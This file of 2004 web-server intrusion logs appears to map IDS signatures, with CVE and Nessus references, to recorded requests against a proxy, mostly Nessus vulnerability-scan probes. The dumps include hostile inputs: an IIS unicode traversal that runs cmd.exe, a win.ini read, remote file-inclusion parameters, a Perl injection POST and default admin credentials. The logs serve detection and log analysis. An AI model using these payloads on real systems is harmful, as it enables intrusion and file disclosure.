1872	Nessus 10848	web-application-activity	WEB-MISC Oracle Dynamic Monitoring Services (dms) access	Request: 217.160.165.173 - - [Fri Mar 12 22:32:09 2004] "GET /dms0/ HTTP/1.1" 403 289 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/dms0 ---------------------------------------- GET /dms0/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=73 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1875	Nessus 10780 Nessus 10779	web-application-activity	WEB-CGI cgicso access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:16 2004] "GET /cgi-bin/cgicso?query=AAA HTTP/1.1" 403 298 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/cgicso ---------------------------------------- GET /cgi-bin/cgicso?query=AAA HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1877	CVE-2000-0868 Nessus 10503	web-application-activity	WEB-CGI printenv access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:14 2004] "GET /cgi-bin-sdb/printenv HTTP/1.1" 404 300 Handler: (null) Error: mod_security: Warning. Pattern match "/printenv" at THE_REQUEST. ---------------------------------------- GET /cgi-bin-sdb/printenv HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/printenv" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1880	Nessus 10348 BID1053 CVE-2000-0169	web-application-activity	WEB-MISC oracle web application server access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:04 2004] "GET /ows-bin/perlidlc.bat HTTP/1.1" 404 300 Handler: (null) Error: mod_security: Warning. Pattern match "/ows-bin/" at THE_REQUEST. ---------------------------------------- GET /ows-bin/perlidlc.bat HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/ows-bin/" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1945	CVE-2000-0884	web-application-attack	WEB-IIS unicode directory traversal attempt	Request: 68.48.142.117 - - [Tue Mar 9 22:29:43 2004] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/scripts/..%5c../winnt/system32/cmd.exe] for 50000 ms ---------------------------------------- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Connnection: close Host: www mod_security-message: Access denied with code 200. Pattern match "cmd\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
1946		web-application-activity	WEB-MISC answerbook2 admin attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:37:06 2004] "POST /cgi-bin/admin/admin.cgi HTTP/1.1" 404 303 Handler: cgi-script Error: mod_security: Warning. Pattern match "/cgi-bin/admin/admin" at THE_REQUEST. ---------------------------------------- POST /cgi-bin/admin/admin.cgi HTTP/1.1 Content-Length: 49 Content-Type: application/x-www-form-urlencoded Host: www.testproxy.net:8000 mod_security-message: Warning. Pattern match "/cgi-bin/admin/admin" at THE_REQUEST. login=1&user=Admin&password=ImageFolio&save=Login HTTP/1.1 404 Not Found Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1969	BID6091	web-application-activity	WEB-MISC ion-p access	Request: 217.160.165.173 - - [Fri Mar 12 22:44:32 2004] "GET /cgi-bin/ion-p.exe?page=c:\\winnt\\win.ini HTTP/1.1" 404 297 Handler: cgi-script Error: mod_security: Warning. Pattern match "/ion-p" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/ion-p.exe?page=c:\\winnt\\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/ion-p" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1979	Nessus 11158 BID5520	web-application-attack	WEB-MISC perl post attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:30:36 2004] "POST /perl/ HTTP/1.1" 404 285 Handler: (null) Error: File does not exist: /usr/local/apache/htdocs/perl/ ---------------------------------------- POST /perl/ HTTP/1.1 Content-Length: 60 Content-Type: application/octet-stream Host: www.testproxy.net mod_security-message: Access denied with code 200. Pattern match "/perl/" at THE_REQUEST. print("Content-Type: text/plain\r\n\r\n", "Nessus=", 42+42); HTTP/1.1 404 Not Found Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1994	Nessus 11165	web-application-activity	WEB-CGI vpasswd.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:04 2004] "GET /cgi-bin/vpasswd.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/vpasswd.cgi ---------------------------------------- GET /cgi-bin/vpasswd.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1996	CAN-2001-0849 Nessus 11107	web-application-activity	WEB-CGI viralator.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:02 2004] "GET /cgi-bin/viralator.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/viralator.cgi ---------------------------------------- GET /cgi-bin/viralator.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2000	Nessus 11073	web-application-activity	WEB-PHP readmsg.php access	Request: 217.160.165.173 - - [Fri Mar 12 22:43:03 2004] "GET /base/webmail/readmsg.php HTTP/1.1" 404 304 Handler: (null) Error: mod_security: Warning. Pattern match "/readmsg\.php" at THE_REQUEST. ---------------------------------------- GET /base/webmail/readmsg.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/readmsg\.php" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2001		web-application-activity	WEB-CGI smartsearch.cgi access	Request: 220.175.18.42 - - [Tue Mar 9 22:47:30 2004] "GET http://www.searchlikecrazy.com/cgi-bin/smartsearch.cgi?keywords=Web+Design%20&username=arongyi HTTP/1.0" 200 26166 Handler: proxy-server Error: mod_security: Warning. Pattern match "/smartsearch\.cgi" at THE_REQUEST. ---------------------------------------- GET http://www.searchlikecrazy.com/cgi-bin/smartsearch.cgi?keywords=Web+Design%20&username=arongyi HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, / Accept-Encoding: deflate Accept-Language: en Host: www.searchlikecrazy.com Proxy-Connection: Keep-Alive Referer: http://www.yourwindow.com/searchlikecrazy.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; MyIE2) mod_security-message: Warning. Pattern match "/smartsearch\.cgi" at THE_REQUEST. HTTP/1.0 200 OK Content-Type: text/html; charset=ISO-8859-1 X-Cache: MISS from www.testproxy.net Connection: close
2052	CA-2002-35 Nessus 11190	web-application-activity	WEB-CGI overflow.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:11 2004] "GET /cgi-bin/.cobalt/overflow/overflow.cgi HTTP/1.1" 404 317 Handler: cgi-script Error: mod_security: Warning. Pattern match "/overflow\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/.cobalt/overflow/overflow.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/overflow\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2056	BID9561 Nessus 11213 whitehatsec	web-application-attack	WEB-MISC TRACE attempt	Request: 66.36.242.145 - - [Tue Mar 9 23:49:16 2004] "GET http://www.above.net/cgi-bin/trace?203.199.64.132 HTTP/1.1" 200 578 Handler: proxy-server Error: mod_security: pausing [http://www.above.net/cgi-bin/trace?203.199.64.132] for 50000 ms ---------------------------------------- GET http://www.above.net/cgi-bin/trace?203.199.64.132 HTTP/1.1 Host: www.above.net Proxy-Connection: Keep-Alive mod_security-message: Access denied with code 200. Pattern match "TRACE" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2060	Nessus 11180	web-application-activity	WEB-MISC DB4Web access	Request: 217.160.165.173 - - [Fri Mar 12 22:46:28 2004] "GET /DB4Web/port-scan.de:23/foo HTTP/1.1" 404 306 Handler: (null) Error: mod_security: Warning. Pattern match "/DB4Web/" at THE_REQUEST. ---------------------------------------- GET /DB4Web/port-scan.de:23/foo HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/DB4Web/" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2066		web-application-attack	WEB-MISC Lotus Notes .pl script source download attempt	Request: 220.175.18.42 - - [Tue Mar 9 22:47:19 2004] "GET http://www.stayinvisible.com/index.pl/ip_test_result_nocache HTTP/1.0" 200 8030 Handler: proxy-server ---------------------------------------- GET http://www.stayinvisible.com/index.pl/ip_test_result_nocache HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, / Accept-Encoding: deflate Accept-Language: en Host: www.stayinvisible.com Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) HTTP/1.0 200 OK Set-Cookie: wgSession=19wtMvmh2HVMM; path=/; expires=Sat, 08-Mar-2014 04:04:57 GMT Content-Type: text/html; charset=ISO-8859-1 X-Cache: MISS from www.stayinvisible.com, MISS from www.testproxy.net Connection: close
2067		web-application-attack	WEB-MISC Lotus Notes .exe script source download attempt	Request: 212.57.187.242 - - [Tue Mar 9 22:11:27 2004] "GET https://www.chel.mts.ru/sms/cgi-bin/cgi_.exe?function=sms_send HTTP/1.1" 200 23501 Handler: proxy-server ---------------------------------------- GET https://www.chel.mts.ru/sms/cgi-bin/cgi_.exe?function=sms_send HTTP/1.1 Connection: Keep-Alive Host: www.chel.mts.ru Keep-Alive: 300 Referer: http://www.ya.ru/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.03 [en] HTTP/1.1 200 OK Set-cookie: session_id=UNI_chl2_37c3726f76530a0fe; Content-Type: text/html; charset=windows-1251 X-Cache: MISS from www.testproxy.net Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked
2078	BID6634	web-application-activity	WEB-PHP phpBB privmsg.php access	Request: 217.136.209.143 - - [Fri Mar 12 07:29:20 2004] "GET http://boomslang.no-ip.com/forom/privmsg.php?folder=inbox&sid=e7e156cbecc071d9ab69211a33223abc HTTP/1.0" 302 0 Handler: proxy-server Error: mod_security: Warning. Pattern match "/privmsg\.php" at THE_REQUEST. ---------------------------------------- GET http://boomslang.no-ip.com/forom/privmsg.php?folder=inbox&sid=e7e156cbecc071d9ab69211a33223abc HTTP/1.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,/;q=0.1 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Language: fr,en;q=0.5 Cookie: BoOmTeAm[BoarD]_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; BoOmTeAm[BoarD]_sid=e7e156cbecc071d9ab69211a33223abc Host: boomslang.no-ip.com Keep-Alive: 300 Proxy-Connection: close Referer: http://boomslang.no-ip.com/forom/login.php?redirect=privmsg.php&folder=inbox&sid=d53404759076e80271dab6863c792e04 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.5) Gecko/20031007 Firebird/0.7 mod_security-message: Warning. Pattern match "/privmsg\.php" at THE_REQUEST. HTTP/1.0 302 Found X-Powered-By: PHP/4.3.3 Set-Cookie: BoOmTeAm[BoarD]_data=a%3A0%3A%7B%7D; expires=Sat, 12-Mar-2005 12:29:29 GMT; path=/; domain=boomslang.no-ip.com Set-Cookie: BoOmTeAm[BoarD]_sid=ae9204467a79b964054b22ead15c1dba; path=/; domain=boomslang.no-ip.com Location: http://boomslang.no-ip.com/forom/login.php?redirect=privmsg.php&folder=inbox&sid=ae9204467a79b964054b22ead15c1dba Content-Type: text/html X-Cache: MISS from www.testproxy.net Connection: close
2085	CAN-2003-0054	web-application-activity	WEB-CGI parse_xml.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:50 2004] "GET /AdminHTML/parse_xml.cgi HTTP/1.1" 404 303 Handler: (null) Error: mod_security: Warning. Pattern match "/parse_xml\.cgi" at THE_REQUEST. ---------------------------------------- GET /AdminHTML/parse_xml.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/parse_xml\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2115	BID7444	web-application-activity	WEB-CGI album.pl access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:52 2004] "GET /cgi-bin/album.pl?function=about HTTP/1.1" 404 296 Handler: cgi-script Error: mod_security: Warning. Pattern match "/album\.pl" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/album.pl?function=about HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/album\.pl" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2127	Nessus 11605 BID7361	web-application-activity	WEB-CGI ikonboard.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:56 2004] "GET /cgi-bin/ikonboard.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ikonboard.cgi ---------------------------------------- GET /cgi-bin/ikonboard.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Cookie: lang=%2E%00%22 Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2129	ms03-018 Nessus 11664	web-application-activity	WEB-IIS nsiislog.dll access	Request: 217.160.165.173 - - [Fri Mar 12 22:46:38 2004] "GET /scripts/nsiislog.dll HTTP/1.1" 404 300 Handler: (null) Error: mod_security: Warning. Pattern match "/nsiislog\.dll" at THE_REQUEST. ---------------------------------------- GET /scripts/nsiislog.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/nsiislog\.dll" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2130	BID7675 Nessus 11662	web-application-activity	WEB-IIS IISProtect siteadmin.asp access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:38 2004] "GET /iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus HTTP/1.1" 404 310 Handler: (null) Error: mod_security: Warning. Pattern match "/iisprotect/admin/SiteAdmin\.asp" at THE_REQUEST. ---------------------------------------- GET /iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/iisprotect/admin/" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2133	CAN-2003-0118 CAN-2003-0117 BID7470 BID7469 Nessus 11638	web-application-activity	WEB-IIS MS BizTalk server access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:43 2004] "POST /manual/biztalkhttpreceive.dll HTTP/1.1" 403 313 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/manual/biztalkhttpreceive.dll ---------------------------------------- POST /manual/biztalkhttpreceive.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Content-Length: 6 Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) [POST payload not available] HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2134	Nessus 11621	web-application-activity	WEB-IIS register.asp access	Request: 217.160.165.173 - - [Fri Mar 12 22:46:20 2004] "POST /forum/register.asp?mode=DoIt HTTP/1.1" 404 298 Handler: (null) Error: mod_security: Warning. Pattern match "/register\.asp" at THE_REQUEST. ---------------------------------------- POST /forum/register.asp?mode=DoIt HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,/;q=0.1 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate,compress;q=0.9 Accept-Language: en-us,en;q=0.5 Content-Length: 167 Content-Type: application/x-www-form-urlencoded Host: www.testproxy.net Referer: http:/www.testproxy.net/forum/register.asp User-Agent: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:1.3) mod_security-message: Warning. Pattern match "/register\.asp" at THE_REQUEST. Refer=&Email=test%27example.org&Email2=&HideMail=0&ICQ=&YAHOO=&AIM=&Homepage=&Link1=&Link2=&Name=test&Password=test&Password-d=&Country=&Sig=&MEMBER_ID=&Submit1=Submit HTTP/1.1 404 Not Found Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2135	Nessus 11682	web-application-activity	WEB-MISC philboard.mdb access	Request: 217.160.165.173 - - [Fri Mar 12 22:43:12 2004] "GET /forum/database/philboard.mdb HTTP/1.1" 404 308 Handler: (null) Error: mod_security: Warning. Pattern match "/philboard\.mdb" at THE_REQUEST. ---------------------------------------- GET /forum/database/philboard.mdb HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/philboard\.mdb" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2137	BID7739 Nessus 11675	web-application-activity	WEB-MISC philboard_admin.asp access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:14 2004] "GET /philboard/philboard_admin.asp HTTP/1.1" 404 309 Handler: (null) Error: mod_security: Warning. Pattern match "/philboard_admin\.asp" at THE_REQUEST. ---------------------------------------- GET /philboard/philboard_admin.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/philboard_admin\.asp" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2138	BID6996 Nessus 11639	web-application-activity	WEB-MISC logicworks.ini access	Request: 217.160.165.173 - - [Fri Mar 12 22:36:47 2004] "GET /cgi-bin/logicworks.ini HTTP/1.1" 404 302 Handler: cgi-script Error: mod_security: Warning. Pattern match "/logicworks\.ini" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/logicworks.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/logicworks\.ini" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2140	Nessus 11669	web-application-activity	WEB-PHP p-news.php access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:03 2004] "GET /news/p-news.php HTTP/1.1" 404 295 Handler: (null) Error: mod_security: Warning. Pattern match "/p-news\.php" at THE_REQUEST. ---------------------------------------- GET /news/p-news.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/p-news\.php" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2143	Nessus 11667	web-application-attack	WEB-PHP b2 cafelog gm-2-b2.php remote command execution attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:43:46 2004] "GET /cgi-bin/b2-tools/gm-2-b2.php?b2inc=http://xxxxxxxx HTTP/1.1" 403 312 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/b2-tools ---------------------------------------- GET /cgi-bin/b2-tools/gm-2-b2.php?b2inc=http://xxxxxxxx HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2147	BID7677 Nessus 11647	web-application-attack	WEB-PHP BLNews objects.inc.php4 remote command execution attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:45:31 2004] "GET /cgi-bin/admin/objects.inc.php4?Server[path]=http://xxxxxx&Server[language_file]=nessus.php HTTP/1.1" 403 314 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/admin ---------------------------------------- GET /cgi-bin/admin/objects.inc.php4?Server[path]=http://xxxxxx&Server[language_file]=nessus.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2149	Nessus 11646	web-application-activity	WEB-PHP Turba status.php access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:53 2004] "GET /cgi-bin/turba/status.php HTTP/1.1" 403 308 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/turba ---------------------------------------- GET /cgi-bin/turba/status.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2150	BID7625 BID7543 BID7542 Nessus 11636	web-application-attack	WEB-PHP ttCMS header.php remote command execution attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:42:59 2004] "GET /cgi-bin/admin/templates/header.php?admin_root=http://xxxxxxxx. HTTP/1.1" 403 318 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/admin ---------------------------------------- GET /cgi-bin/admin/templates/header.php?admin_root=http://xxxxxxxx. HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Cookie: ttcms_user_admin=1 Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2152	Nessus 11617	web-application-activity	WEB-PHP test.php access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:00 2004] "GET /imp/test.php HTTP/1.1" 403 296 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/imp ---------------------------------------- GET /imp/test.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
